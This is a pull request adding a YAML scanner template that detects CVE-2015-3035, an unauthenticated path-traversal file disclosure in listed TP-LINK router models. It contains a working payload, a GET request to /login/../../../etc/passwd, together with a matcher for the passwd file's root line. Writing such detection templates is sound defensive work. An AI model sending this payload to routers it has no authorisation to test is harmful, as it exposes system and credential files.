### PR TITLE
Create CVE-2015-3035.yaml

### DIFF
--- a/CVE-2015-3035.yaml
+++ b/CVE-2015-3035.yaml
@@ -1,0 +1,31 @@
+id: CVE-2015-3035
+info:
+  name: Unauthenticated Local File Disclosure in multiple TP-LINK products
+  author: 0x_Akoko
+  severity: high
+  description: Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.
+  reference:
+    - https://seclists.org/fulldisclosure/2015/Apr/26
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-3035
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-3035
+    cwe-id: CWE-22
+  tags: cve,cve2015,tplink,router,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login/../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

**Unauthenticated Local File Disclosure in multiple TP-LINK products**

Vulnerable / tested versions:
-----------------------------
The vulnerability affects the following products:

TP-LINK Archer C5 (Hardware version 1.2)
TP-LINK Archer C7 (Hardware version 2.0)
TP-LINK Archer C8 (Hardware version 1.0)
TP-LINK Archer C9 (Hardware version 1.0)
TP-LINK TL-WDR3500 (Hardware version 1.0)
TP-LINK TL-WDR3600 (Hardware version 1.0)
TP-LINK TL-WDR4300 (Hardware version 1.0)
TP-LINK TL-WR740N (Hardware version 5.0)
TP-LINK TL-WR741ND (Hardware version 5.0)
TP-LINK TL-WR841N (Hardware version 9.0)
TP-LINK TL-WR841N (Hardware version 10.0)
TP-LINK TL-WR841ND (Hardware version 9.0)
TP-LINK TL-WR841ND (Hardware version 10.0)

- Reference:
    - https://seclists.org/fulldisclosure/2015/Apr/26
    - https://nvd.nist.gov/vuln/detail/CVE-2015-3035

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

